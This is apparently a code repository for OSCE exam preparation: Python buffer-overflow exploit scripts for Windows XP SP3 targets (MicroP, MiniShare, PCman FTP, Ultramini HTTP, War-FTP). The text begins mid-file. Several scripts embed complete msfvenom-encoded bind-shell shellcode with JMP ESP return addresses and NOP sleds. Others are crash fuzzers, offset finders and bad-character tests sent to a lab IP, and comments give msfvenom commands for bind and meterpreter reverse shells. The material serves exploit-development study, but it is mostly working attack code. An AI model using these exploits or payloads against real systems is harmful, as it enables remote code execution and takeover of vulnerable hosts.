("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "A"*1276 33 | buffer+= "\x66\xe8\x41\x7e" 34 | buffer+= "\x90"*100 35 | buffer+= shellcode 36 | buffer+= "C"*2000 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt3.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "A"*1276 33 | buffer+= "\x66\xe8\x41\x7e" 34 | buffer+= "\x90"*100 35 | buffer+= shellcode 36 | buffer+= "C"*2000 37 | 38 | file.write(buffer) 39 | 40 | file.close() 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt4.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 8 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 9 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 10 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 11 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 12 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 13 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 14 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 15 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 16 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 17 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 18 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 19 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 20 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 21 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 22 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 23 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 24 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 25 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 26 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 27 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 28 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 29 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 30 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 31 | 32 | buffer= "\x90"*24 33 | buffer+= shellcode 34 | buffer+= "\x90"*(1276-len(buffer)) 35 | buffer+= "\x66\xe8\x41\x7e" 36 | 37 | file.write(buffer) 38 | 39 | file.close() 40 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Minishare_1.4.1_HTTP_Server/minishare_1.4.1_http_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | MiniShare 1.4.1 HTTP Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 36684335 -> offset at 1787 18 | offset = 'A'*1787 + 'B'*4 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7c9d30d7 or \xd7\x30\x9d\x7c 21 | #nowjump = '\xd7\x30\x9d\x7c' 22 | 23 | #bufferandshellcode 24 | sploit = offset + "C"*(2200-len(offset)) 25 | 26 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | print "\nDestroy them with lazers..." 28 | s.connect(('172.16.73.129',80)) 29 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 30 | s.close 31 | print "\nFire in the hole! Go pick up the pieces!" 32 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Minishare_1.4.1_HTTP_Server/minishare_1.4.1_http_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | MiniShare v1.4.1 HTTP Exploit Fuzzer 10 | 1. python minishare_1.4.1_http_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = () 18 | 19 | offset = "A" * 2220 20 | #nowjump 21 | #bufferandshellcode 22 | sploit = offset 23 | 24 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',80)) 27 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 28 | s.close 29 | print "\nFire in the hole! Go pick up the pieces!" 30 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/PCman_FTP_Server/pcman_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | pcman FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 43396f43 -> offset at 2007 18 | offset = 'A'*2007 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x77c35459 or \x59\x54\xc3\x77 21 | #nowjump = '\x59\x54\xc3\x77' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(2500-len(offset+nowjump)) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER anonymous\r\n') 33 | s.recv(1024) 34 | s.send('PASS anonymous\r\n') 35 | s.recv(1024) 36 | s.send('PUT ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/PCman_FTP_Server/pcman_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | pcman FTP Server Exploit Fuzzer 10 | 1. python pcman_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = ( 17 | 18 | offset = "A" *2500 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER anonymous\r\n') 29 | s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | s.recv(1024) 32 | s.send('PUT ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/ultramini_http_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ultra Mini HTTP Server - Offset & JMP ESP 10 | 1. python ultramini_http_server_eip2.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | #EIP = 79473479 -> offset at 5413 19 | offset = 'A'*5413 20 | 21 | #JMP ESP = !mona jmp -r esp -> 0x7e429353 or \x53\x93\x42\x7e 22 | #nowjump = '\x53\x93\x42\x7e' 23 | nowjump = 'B'*4 24 | 25 | #bufferandshellcode 26 | sploit = offset + nowjump + "\x90"*(5500-len(offset+nowjump)) 27 | 28 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',80)) 31 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 32 | s.close 33 | print "\nFire in the hole! Go pick up the pieces!" 34 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/ultramini_http_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | Ultra Mini HTTP Server HTTP Exploit Fuzzer 10 | 1. python ultramini_http_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = () 18 | 19 | offset = "A" * 5500 20 | #nowjump 21 | #bufferandshellcode 22 | sploit = offset 23 | 24 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',80)) 27 | s.send('GET ' + sploit + ' HTTP/1.1\r\n\r\n') 28 | s.close 29 | print "\nFire in the hole! Go pick up the pieces!" 30 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Ultramini_HTTP_Server/umhttp3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import struct 5 | 6 | shellcode=("\xb8\x22\xed\x67\xaa\xdb\xc6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" 7 | "\x53\x83\xc3\x04\x31\x43\x0e\x03\x61\xe3\x85\x5f\x99\x13\xcb" 8 | "\xa0\x61\xe4\xac\x29\x84\xd5\xec\x4e\xcd\x46\xdd\x05\x83\x6a" 9 | "\x96\x48\x37\xf8\xda\x44\x38\x49\x50\xb3\x77\x4a\xc9\x87\x16" 10 | "\xc8\x10\xd4\xf8\xf1\xda\x29\xf9\x36\x06\xc3\xab\xef\x4c\x76" 11 | "\x5b\x9b\x19\x4b\xd0\xd7\x8c\xcb\x05\xaf\xaf\xfa\x98\xbb\xe9" 12 | "\xdc\x1b\x6f\x82\x54\x03\x6c\xaf\x2f\xb8\x46\x5b\xae\x68\x97" 13 | "\xa4\x1d\x55\x17\x57\x5f\x92\x90\x88\x2a\xea\xe2\x35\x2d\x29" 14 | "\x98\xe1\xb8\xa9\x3a\x61\x1a\x15\xba\xa6\xfd\xde\xb0\x03\x89" 15 | "\xb8\xd4\x92\x5e\xb3\xe1\x1f\x61\x13\x60\x5b\x46\xb7\x28\x3f" 16 | "\xe7\xee\x94\xee\x18\xf0\x76\x4e\xbd\x7b\x9a\x9b\xcc\x26\xf3" 17 | "\x68\xfd\xd8\x03\xe7\x76\xab\x31\xa8\x2c\x23\x7a\x21\xeb\xb4" 18 | "\x7d\x18\x4b\x2a\x80\xa3\xac\x63\x47\xf7\xfc\x1b\x6e\x78\x97" 19 | "\xdb\x8f\xad\x02\xd3\x36\x1e\x31\x1e\x88\xce\xf5\xb0\x61\x05" 20 | "\xfa\xef\x92\x26\xd0\x98\x3b\xdb\xdb\xb7\xe7\x52\x3d\xdd\x07" 21 | "\x33\x95\x49\xea\x60\x2e\xee\x15\x43\x06\x98\x5e\x85\x91\xa7" 22 | "\x5e\x83\xb5\x3f\xd5\xc0\x01\x5e\xea\xcc\x21\x37\x7d\x9a\xa3" 23 | "\x7a\x1f\x9b\xe9\xec\xbc\x0e\x76\xec\xcb\x32\x21\xbb\x9c\x85" 24 | "\x38\x29\x31\xbf\x92\x4f\xc8\x59\xdc\xcb\x17\x9a\xe3\xd2\xda" 25 | "\xa6\xc7\xc4\x22\x26\x4c\xb0\xfa\x71\x1a\x6e\xbd\x2b\xec\xd8" 26 | "\x17\x87\xa6\x8c\xee\xeb\x78\xca\xee\x21\x0f\x32\x5e\x9c\x56" 27 | "\x4d\x6f\x48\x5f\x36\x8d\xe8\xa0\xed\x15\x18\xeb\xaf\x3c\xb1" 28 | "\xb2\x3a\x7d\xdc\x44\x91\x42\xd9\xc6\x13\x3b\x1e\xd6\x56\x3e" 29 | "\x5a\x50\x8b\x32\xf3\x35\xab\xe1\xf4\x1f") 30 | 31 | buffer = "\x90"*5412 32 | buffer += "\x53\x93\x42\x7e" 33 | buffer += "\x90"*192 34 | buffer += shellcode 35 | buffer += "\x90"*5158 36 | 37 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | s.connect(("172.16.73.129",80)) 39 | 40 | payload = ( 41 | "GET /" + buffer + " HTTP/1.1\r\n" + 42 | "Host: 172.16.73.129" + 43 | "\r\n\r\n") 44 | 45 | s.send(payload) 46 | s.close() 47 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-b-crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-b-crash.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | buffer = "A"*485 19 | buffer += "B"*4 20 | buffer += "C"*3000 21 | 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | print s.recv(1024) 28 | s.send('USER ' + buffer + '\r\n') 29 | print s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | print s.recv(1024) 32 | s.close() 33 | print "\nFire in the hole! Go pick up the pieces!" 34 | except: 35 | print "ERROR! Shutting it dooooown.." -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-badchars.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | #\x00\x0a\x0d\x40 18 | 19 | buffer = "A"*485 20 | buffer += "B"*4 21 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 22 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f" 23 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 24 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 25 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 26 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 27 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 28 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 29 | buffer += "D"*(1100-len(buffer)) 30 | 31 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 32 | try: 33 | print "\nDestroy them with lazers..." 34 | s.connect(('172.16.73.129',21)) 35 | print s.recv(1500) 36 | s.send('USER ' + buffer + '\r\n') 37 | print s.recv(1500) 38 | s.send('PASS chanch@chanch.com\r\n') 39 | print s.recv(1500) 40 | s.close() 41 | print "\nFire in the hole! Go pick up the pieces!" 42 | except: 43 | print "ERROR! Shutting it dooooown.." 44 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/War-FTP_Server/war-ftpd-crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | War-FTP Server Exploit Fuzzer 10 | 1. python war-ftpd-crash.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = () 17 | 18 | buffer = "A"*5000 19 | 20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | try: 22 | print "\nDestroy them with lazers..." 23 | s.connect(('172.16.73.129',21)) 24 | print s.recv(1024) 25 | s.send('USER ' + buffer + '\r\n') 26 | print s.recv(1024) 27 | s.send('PASS anonymous\r\n') 28 | print s.recv(1024) 29 | s.close() 30 | print "\nFire in the hole! Go pick up the pieces!" 31 | except: 32 | print "ERROR! Shutting it dooooown.." -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCEPrep 2 | Any code for preparing for OSCE 3 | --------------------------------------------------------------------------------